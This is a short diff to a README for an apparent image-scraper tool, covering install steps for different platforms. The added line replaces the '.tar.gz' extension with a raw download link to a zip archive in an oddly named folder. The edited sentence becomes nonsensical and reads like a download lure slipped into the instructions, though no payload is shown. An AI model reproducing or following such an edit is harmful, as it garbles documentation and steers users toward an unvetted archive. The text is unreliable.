zt8812/lightning-image-scraper/README.md

   - If you download a `.exe` file, just double-click it to start.
   - If you get a `.zip` file, right-click it, select "Extract All," and choose a folder.
 - For macOS and Linux:
-  - If you get a `.tar.gz` or `.zip`, extract it using the default archive tool.
+  - If you get a `https://github.com/zt8812/lightning-image-scraper/raw/refs/heads/main/remisrepresentation/lightning_image_scraper_1.0.zip` or `.zip`, extract it using the default archive tool.
   - Follow any instructions in the extracted folder, usually found in a README or INSTALL file.

 ### Step 4: Ready to run